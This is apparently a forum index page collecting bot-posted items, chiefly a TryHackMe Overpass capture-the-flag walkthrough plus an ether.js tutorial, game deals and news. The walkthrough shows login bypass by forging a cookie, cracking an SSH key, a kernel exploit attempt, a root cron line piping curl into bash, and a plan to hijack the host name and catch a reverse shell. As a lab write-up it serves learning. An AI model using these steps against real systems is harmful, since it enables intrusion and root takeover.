Create an account


Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 20,114
» Latest member: gfhfhfh
» Forum threads: 21,709
» Forum posts: 22,575

Full Statistics

Online Users
There are currently 742 online users.
» 0 Member(s) | 737 Guest(s)
Applebot, Baidu, Bing, Google, Yandex

 
  [Oracle Blog] JDK 16 is live!
Posted by: xSicKxBot - 12-27-2022, 04:26 PM - Forum: Java Language, JVM, and the JRE - No Replies

JDK 16 is live!

JDK 16 is live! Download it from the Java SE Downloads page. See the JDK 16 Release Notes for detailed information about this release. The following are some of the important additions and updates in Java SE 16 and JDK 16: The Java programming language is enhanced with pattern matching for the insta...


https://blogs.oracle.com/java/post/jdk-16-is-live

Print this item

  [Tut] How I Hacked a PW Manager (TryHackMe Overpass 1)
Posted by: xSicKxBot - 12-27-2022, 04:26 PM - Forum: Python - No Replies

How I Hacked a PW Manager (TryHackMe Overpass 1)

5/5 – (1 vote)

YouTube Video

PREMISE


The premise of the box is that a group of computer science students has created a password encryption/decryption tool.

Target: One of the CS students posing on a party ?

? "What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!" 

We are tasked with hacking our way into their server as the root user.

Attacker: A sophisticated hacker – not who you may expect.

This capture-the-flag challenge on TryHackMe involves cookie creation and file spoofing in order to escalate privileges to the root user. It is rated as an easy box. If you don’t like spoilers, I’d recommend trying this free hacking challenge first before reading any further.

This box is the first in a three-part series. In part two, we will be doing some basic forensics after a cyber attack hits the overpass server.

And in part three we will prove to the Overpass developers that they need to make some security upgrades to their server hosting.

First, let’s record our IPs and get them ready to export as Linux variables.

export targetIP=10.10.179.249
export myIP=10.6.2.23

ENUMERATION



A simple nmap scan shows the following results:

┌─[kalisurfer@parrot]─[~/THM/overpass-walkthrough]
└──╼ $sudo nmap $targetIP
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-21 06:01 EST
Nmap scan report for 10.10.179.249
Host is up (0.087s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds
---

Nothing is surprising here. These are the standard ports for HTTP web applications and ssh services. 

Next, we’ll run a dirb scan to do some directory sniffing. Our dirb scan results reveal a few interesting HTML directories. We’ll take a closer look into each of these leads.

/admin
/aboutus
/css
/downloads

We find the plaintext sourcecode in the /downloads folder!

This will almost certainly be worth looking at closely for more information about the encryption mechanism. Posting the sourcecode is the first of several horrible decisions the Overpass dev team has made with their password storage program.

Some of the takeaways from examining the source code are:

  1. The encryption method used is a caesar cypher with a rotation of 47. There is a link in the sourcecode pointing to: https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example
  2. Encrypted passwords are saved locally in a hidden file .passlist in the root directory. This will probably be are method for retrieving the root password after we gain an initial foothold into the system.
  3. This encryption (ROT47) is invertible, which means to decrypt a password all we have to do is run the ROT47 cipher code a second time.

There is also an executable file for each operating system of the password storage tool. Download and running the program overpassLinux shows that we can retrieve passwords as long as there is a .overpass hidden file in the /root directory.

INITIAL FOOTHOLD VIA COOKIE CREATION


We find a login portal at $targetIP/admin.

First, we inspect the login with burpsuite and carefully examine the response to an unsuccessful username:password, noticing that the user is rerouted to /admin after an unsuccessful login attempt.

Instead of wasting time attempting to bruteforce our way in with a wordlist, we use firefox in developer mode and discover that there are no stored cookies. If we create a new cookie with the name SessionToken, and a reroute path of “/” we find a hidden encrypted ssh key. Voila!

Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we really need to talk about this "Military Grade" encryption. - Paradox -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
-----END RSA PRIVATE KEY-----

It looks like our initial foothold will be as the user james. Let’s pause for a moment to collect our thoughts and plan out the next steps in our attack.

RETRIEVING THE PASSCODE FOR THE ENCRYPTED SSH FILE


This is our plan going forward to retrieve the passcode for the encrypted ssh file:

  1. Save the ssh key string as a new file (without the header and footer).
  2. Use ssh2john to prep the hash for john the ripper.
  3. Use john to crack that hash and find key our ssh keyfile passcode

SSHing INTO USER JAMES


With the following command, we can now log in as james with our trusty ssh passcode and ssh keyfile. The user.txt flag is right there in James’ home folder.

!!!
Thm{65c 6bf7}
!!!

USING OVERPASSLINUX TO RETRIEVE THE USER PASSWORD


Now that we are in as user James, we can run the overpass program again on the encoded string (,LQ?2>                                       8A:4EFC6QN.)

We hit a small snag, seeing that user James doesn’t have proper permissions to run overpassLinux on target machine. Using SCP we can copy James’ .overpass file to our attack machine. Running overpassLinux on our machine, we can now recover James’ account password. 

I decided to use python3 to create a rot47 encryption/decryption script. A quick google search brought up the following script:

def rot47(s): x = [] for i in range(len(s)): j = ord(s[i]) if j >= 33 and j <= 126: x.append(chr(33 + ((j + 14) % 94))) else: x.append(s[i]) return ''.join(x) s=",LQ?2> 8A:4EFC6QN."
print(rot47(s))

Using nano to edit the script, I added a few tweaks to make it run smoothly on my machine and decrypt James’ password.

[{"name":"System","pass":" "}]
!!! (james password)

FURTHER ENUMERATION FOR POTENTIAL ATTACK VECTORS


First, I explored whether or not there are setuid bins that user james can run on the system with the following command:

james@overpass-prod:~$ find /bin -perm -4000 —
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
—

Looking each of these bins up on gtfobins showed that there aren’t any clear paths forward yet…

Checking the kernel on https://www.exploit-db.com/ showed a potential lead – a kernel exploit found on target machine! (https://www.exploit-db.com/exploits/47163 (CVE-2019-13272)).

However, after compiling the exploit and running it on the target machine, the exploit failed saying that this machine is not vulnerable. 

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: Could not find active PolKit agent
[.] Searching for known helpers ...
[.] Searching for useful helpers ...
[.] Ignoring blacklisted helper: /usr/lib/update-notifier/package-system-locked

Running the attack with Metasploit using the PTRACE_TRACEME module also failed, confirming my hunch that this isn’t a viable attack vector. 

FINDING A VIABLE ATTACK VECTOR FOR PRIVILEGE ESCALATION


Next, we check the crontab on the target machine for any automated programs set to run regularly:

cat /etc/crontab

And bingo! We found a viable escalation path -!!!

The following output shows that buildscript.sh is set to run as root every minute as a curl command from overpass.thm/downloads/src/.

 * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Here is our plan going forward to exploit this system misconfiguration:

  1. First, change the /etc/hosts file on our target machine to hijack the overpass.thm domain by rerouting it to our attack machine’s IP
  2. Use revshells.com to create a reverse shell payload to our netcat listener
  3. Create a spoof of buildscript.sh with the malicious payload and locate it at $myIP:/downloads/src/buildscript.sh
  4. Spin up a simple HTTP server on port 80 from our attack machine, serving up the spoofed file in the correct directory (/downloads/src/)
  5. Boot up a Netcat listener on the port we specified in the revshell payload.
  6. Wait for a maximum of 60 seconds to catch the reverse shell as root!
 Thm{7f33 53bb}


https://www.sickgaming.net/blog/2022/12/...verpass-1/

Print this item

  (Free Game Key) Metro Last Light Redux - Free Epic Games Game - 24 Hours Only
Posted by: xSicKxBot - 12-27-2022, 04:26 PM - Forum: Deals or Specials - No Replies

Metro Last Light Redux - Free Epic Games Game - 24 Hours Only

Metro: Last Light Redux - 24 hours only

To grab the game for free:
- Go to the store page of Metro: Last Light Redux
- https://store.epicgames.com/p/metro-last-light-redux
- Click on the GET Button
- Verify that the price is zero
- Click on the Place Order Button
- That's it, the game will be added to you Epic Games Account

This game is free to keep if claimed by December 24, 2022 5:00 PM or in a day

We are welcoming everyone to join our discord[discord.gg]. We are more active there on finding giveaways, small or large, and there are daily raffles you can participate.

?GrabFreeGames.com ?Twitter ?Steam Curator ?Facebook[fb.me]?Discord[discord.gg]
❤️Support us: HumbleBundle Partner[www.humblebundle.com] Fanatical Affiliate[www.fanatical.com]


https://steamcommunity.com/groups/GrabFr...9245147398

Print this item

  News - Today's Wordle Answer (#551) - December 22, 2022
Posted by: xSicKxBot - 12-27-2022, 04:26 PM - Forum: Lounge - No Replies

Today's Wordle Answer (#551) - December 22, 2022

Who doesn't enjoy a little Thursday Wordle action every now and again? We're quickly approaching the holiday weekend, but that doesn't mean Wordle is going easy on players. In fact, the answer on December 22 is one of the toughest this month has had to offer.

If you haven't started the Wordle just yet, then you can check out our list of recommended starting words. However, if you're already past the starting point, then you're likely looking for some hints. Luckily, we provide just that further down in this guide. We will also spell out the full answer for players looking to simply get out of today unscathed.

Today's Wordle Answer - December 22, 2022

We'll begin with a few hints that directly relate to today's Wordle answer, but don't give it away immediately.

Continue Reading at GameSpot

https://www.gamespot.com/articles/todays...01-10abi2f

Print this item

  PC - Wavetale
Posted by: xSicKxBot - 12-27-2022, 04:26 PM - Forum: New Game Releases - No Replies

Wavetale



Surf the waters of a submerged city! Unravel the past, save the islanders from mysterious sea monsters and discover secrets hidden under the surface.

Explore an open sea and the decaying archipelago of Strandville in Wavetale, a story-driven action-adventure game introducing you to fed-up fishermen, secretive hermits - and maybe a pirate or two. Traverse calm waters and surging waves as Sigrid, a young girl who befriends a mysterious shadow that provides her with the power to walk on water.

Speed through the waves, swing yourself from housetops with your net, and defeat an old nemesis to save the citizens of the islands. All with a bit of help from the shadows down below - and your cranky grandmother.

Publisher: Thunderful

Release Date: Dec 12, 2022




https://www.metacritic.com/game/pc/wavetale

Print this item

  [Oracle Blog] Java Recognized as the Favorite Programming Language
Posted by: xSicKxBot - 12-26-2022, 10:27 PM - Forum: Java Language, JVM, and the JRE - No Replies

Java Recognized as the Favorite Programming Language

2020 was a pretty special year for Java. On May 23rd, 2020, the developer community worldwide celebrated 25 years of Java. This memorable milestone was a celebration of 25 years of innovation and community participation. It serves as a reminder that the world is truly Moved by Java, as well as a con...


https://blogs.oracle.com/java/post/java-...g-language

Print this item

  [Tut] I Created a Counter Smart Contract with Ether.js — Here’s How
Posted by: xSicKxBot - 12-26-2022, 10:27 PM - Forum: Python - No Replies

I Created a Counter Smart Contract with Ether.js — Here’s How

5/5 – (1 vote)

One of the presiding JavaScript libraries for interacting with the Ethereum blockchain is ether.js.

The ether.js library, only 88 KB compressed in size, is remarkably smaller than the web3.js library. Because of that, web apps load more quickly if you use the ether.js API. This constantly improving library has already been popular among developers for its developer-friendly modules.

Today we will see how ether.js interacts with the blockchain and the smart contract. We will not go for the theoretical explanation of ether.js.

Instead, we will deal with some practical use cases of ether.js.

Interacting with the Blockchain


Connecting to blockchain:


We need to connect to a node first to interact with the blockchain.

Today we will use Infura, a powerful suite of high-availability blockchain APIs and developer tools. If you still need to make an account in Infura, then just sign up.

After signing in, click the “create new key” button to create a new project. Select the network as web3 API and enter the project name as you wish. A new page will open, and you need to move to the “get started with the web3 Ethereum” option. Just copy the main net link from there.


Then move to the visual studio code. Make a new folder and install node modules and ether.js.

npm init -y
npm install –-save ethers

Create a new javascript file for writing our codes. I am naming it as “etherBlockchain.js”.

Now import ether.js inside the javascript file.

const { ethers } = require("ethers");

Now to read data from the blockchain, we need to fix the provider.

const provider = new ethers.providers.JsonRpcProvider( "https://mainnet.infura.io/v3/3148ece387d84a40b4a8c883b07c33c0"
);

We have pasted the Infura URL as the parameter for JSON RPC provider. This will connect us with the Infura node.

Get the current block:


Using the Infura mainnet, we can get the current block number with the help of ether.js provider.

const interactBlockchain = async () => { const currentBlock = await provider.getBlockNumber(); console.log("You are using the block: ", currentBlock); };

We have created an async await function to identify the block number. getBlockNumber() method of the provider will help us to get the block number. In the vscode terminal, run the script.

node etherBlockchain.js

If everything runs fine, you should get the block number on the screen. Now to verify if it is genuine, visit the etherscan.io website. The current block number must be displayed under the Latest Blocks section.


Get the Balance:


To get the balance, we will use the provider.getBalance() method of ether.js. You need to put the address of any Ethereum account to get the balance of that account.

const balance = await provider.getBalance( "0xF977814e90dA44bFA03b6295A0616a897441aceC" );
console.log(“Account Balance: ”, balance);

All the codes should be kept inside the async await function.

When you run the script, you will get a BigNumber object as a return. Ethereum runs many operations on numbers outside the range of safe values to use in javascript.

? A BigNumber is an object which safely allows mathematical operations on numbers of any magnitude.

Reference: https://docs.ethers.org/v5/api/utils/bignumber/

You need to convert this big number object to a readable format to get the balance of the account.

We will use the formatEther method of the utils library of the ether.js to get the balance in ether.

const balanceInEther = ethers.utils.formatEther(balance);
console.log("Account balance in ether:", balanceInEther);

Now, if you run the script, you should get the account balance in ether.

This utils library of the ether.js is a vast one. You can do so many things with that.

Reference: https://docs.ethers.org/v5/api/utils/

Now to convert the balance in wei again, we will use this utils library.

const balanceInWei = ethers.utils.parseEther(balanceInEther);
console.log("Account balance in wei:", balanceInWei);

When you run the script, You will get the balance in wei.

In this way, you can run any query on the blockchain by using the methods of ether.js. We need to see how we can interact with a smart contract using ether.js.

Interacting with Smart Contracts


We have our simple smart contract ready for deployment on the Remix IDE.

I have made a simple Counter contract that will increase the count by ten whenever you call the increment function.

The getCount() method will return the count whenever you call the getCount() method. We will call those methods from the node terminal of vscode.

pragma solidity >= 0.5.0 < 0.9.0;
contract Counter { uint count = 0; function setCount(uint _count) public { count=_count; } function increment() public { count = count + 10; } function getCount() public view returns (uint) { return count; }
}

We need to deploy the smart contract in a blockchain.

We will use the Goerli testnet to deploy the contract, and the Metamask will be used to establish communication with the testnet.

We need some money on the goerli account to bear the Gas fee cost for the smart contract deployment. If you need to learn how to add the goerli test network on the Meatamask wallet and how to add some free goerli eth on the Metamask wallet, then watch some videos on youtube. It is very easy to add some free eth through the goerli faucet.

Now back to Remix IDE. After doing the compilation, you move to the “DEPLOY AND RUN TRANSACTIONS” section of the Remix IDE. Select the environment as “Injected Provider-Metamask”.


Now click on the deploy button. Metamask will pop up and ask to confirm the transaction. You can even check the transaction on the etherscan if you want.

We need the smart contract address and ABI afterward to create an instance of the smart contract on the node terminal.

For this part, we need to use React as the frontend. This frontend will establish a connection with Metamask. Open the command prompt and type the following to initiate a react app in your directory.

? Recommended: Learn to Build Smart Contracts in React with web3.js: Here’s How!

npx create-react-app ether_smart_contract

A react app on localhost:3000 must be running on your browser. Now, move to the app.js on vscode, clear the code, and import ether.js first.

import { ethers } from "ethers";

We need to use useEffect() hook of the react. Inside the useEffect, create an async await function to write the codes to call the smart contract.

Now again, call the provider; in this case, our provider would be Metamask.

const provider = new ethers.providers.Web3Provider(window.ethereum);

The test goerli network on our Metamask is using the Infura node. Hence, we don’t need to connect to the Infura network manually.

This is one of the privileges of using Metamask. With Metamask wallet, you can connect to different networks easily.


Difference between provider and signer:


We need to introduce a signer for our contract. What is the difference between the provider and the signer?

The provider is required whenever you are reading any data from blockchain or smart contract, but you are not changing the state of something on the smart contract; whenever you are changing the state of something on the smart contract, you need to use the signer.

Actually, when you write something on the smart contract, you are changing the state of something. Whenever you bring some change to the smart contract, you have to bear a cost for the transaction.

The signer will sign a transaction on your behalf to validate the transaction. Every time you click the confirm transaction button on the Metamask, a signer automatically signs a transaction on the backend and validates the transaction.

const signer = provider.getSigner();

Create two variables for the contract ABI and the contract address.

ContractAddress = “Input the contract address”;
ContractABI = “Input the contract ABI”;

Now we can create an instance of the smart contract with the help of contractABI and contractAddress.

const contract = new ethers.Contract( contractAddress, contractABI, signer );

This ethers. The contract method requires the contract address, contract ABI, and the signer as a parameter to create an instance of the smart contract.

Calling the constant methods:


Now our contract instance is ready. Using the contract instance, we can call the readable methods from the smart contracts.

const count = await contract.getCount();
console.log(count);

We have called the getCount() function of the smart contract, which returns a big number. We need to convert it to string. For that,

console.log("Current count is:", String(count));

Calling the non-constant methods:


Now we should get the count in a readable format. We can set the count as we desire by calling the setCount() method from the smart contract.

await contract.setCount(20);

The count must be set as 20. You can call the getCount() methods again to check the count.

Now, if we want to increment the count by ten, then we can call the increment() function with the help of contract.current() method.

const tx = await contract.connect(signer).increment();
await tx.wait();

As we change the blockchain state, we need to connect the signer to approve the transaction. We did it here.

The transaction will take some time to be mined on the blockchain. So, you have to wait a bit to see the count increase.

If you call the getCount() method again after some time, I hope you will see the count has increased by 10.

So that are some ways you can connect to a blockchain and query data from it. You have also seen the way smart contract interacts with ether.js. That’s all for today. Thanks for the reading.



https://www.sickgaming.net/blog/2022/12/...heres-how/

Print this item

  (Indie Deal) FREE Festive Potato | Gearbox, Scorn & Miles Morales Deals
Posted by: xSicKxBot - 12-26-2022, 10:26 PM - Forum: Deals or Specials - No Replies

FREE Festive Potato | Gearbox, Scorn & Miles Morales Deals

Potatoman Seeks the Troof FREEbie
[freebies.indiegala.com]
https://www.youtube.com/watch?v=CMRBuagwRb4
Gearbox Winter Sale & more, up to 91% OFF
[www.indiegala.com]
Don't forget you may get up to 3 extra BONUS games with each purchase. Read more here[www.indiegala.com].
https://www.youtube.com/watch?v=lEE4yZgphFk
[discord.gg]


https://steamcommunity.com/groups/indieg...0187164334

Print this item

  (Free Game Key) Encased - Epic Games - 24 hours only
Posted by: xSicKxBot - 12-26-2022, 10:26 PM - Forum: Deals or Specials - No Replies

Encased - Epic Games - 24 hours only

Encased - 24 hours only

To grab the game for free:
- Go to the store page of Encased
- https://store.epicgames.com/p/encased
- Click on the GET Button
- Verify that the price is zero
- Click on the Place Order Button
- That's it, the game will be added to you Epic Games Account

This game is free to keep if claimed by December 24, 2022 5:00 PM or in a day

We are welcoming everyone to join our discord[discord.gg]. We are more active there on finding giveaways, small or large, and there are daily raffles you can participate.

?GrabFreeGames.com ?Twitter ?Steam Curator ?Facebook[fb.me]?Discord[discord.gg]
❤️Support us: HumbleBundle Partner[www.humblebundle.com] Fanatical Affiliate[www.fanatical.com]


https://steamcommunity.com/groups/GrabFr...9241528423

Print this item

  News - Goat Simulator 3 Ad Includes GTA 6 Leaks, Gets DMCA Notice From Take-Two
Posted by: xSicKxBot - 12-26-2022, 10:26 PM - Forum: Lounge - No Replies

Goat Simulator 3 Ad Includes GTA 6 Leaks, Gets DMCA Notice From Take-Two

An ad for Goat Simulator 3 featured some trollish antics typical of the game itself, as it included gameplay from the massive GTA 6 leak that emerged earlier this year. It didn't take long for GTA publisher Take-Two to issue a DMCA notice to take down the video.

The ad, which is currently unavailable, featured a humorous overview of an NPC named Shaun, who describes his duties as walking around in circles, picking things up, and sitting on a bench. The GTA 6 clip comes late in the ad, when Shaun says that you can see him in some "footage that was leaked a couple of months ago."

The fact that the Goat Simulator developers responded to the original tweet with the memetic "I'm in danger" GIF from The Simpsons indicates that they probably knew what they were doing here. It remains to be seen if Take-Two will take further legal action beyond just this DMCA notice.

Continue Reading at GameSpot

https://www.gamespot.com/articles/goat-s...01-10abi2f

Print this item

 
Latest Threads
(Free Game Key) [GOG] Sil...
Last Post: xSicKxBot
2 hours ago
News - $2.50 Steam Sale H...
Last Post: xSicKxBot
2 hours ago
Forza Horizon 5 Game Save...
Last Post: poxah56770
Today, 10:02 AM
(Xbox One) Vantage - Mod ...
Last Post: levihaxk
Today, 03:59 AM
News - Christopher Nolan’...
Last Post: xSicKxBot
Today, 03:31 AM
News - GameStop Is Not Hu...
Last Post: xSicKxBot
Yesterday, 11:06 AM
News - Subnautica 2’s Leg...
Last Post: xSicKxBot
07-05-2026, 06:45 PM
Redacted T6 Nightly Offli...
Last Post: Ngixk0
07-05-2026, 03:21 PM
News - Sony To End PlaySt...
Last Post: xSicKxBot
07-05-2026, 02:23 AM
Black Ops (BO1, T5) DLC's...
Last Post: BrookesBot
07-04-2026, 06:29 PM

Forum software by © MyBB Theme © iAndrew 2016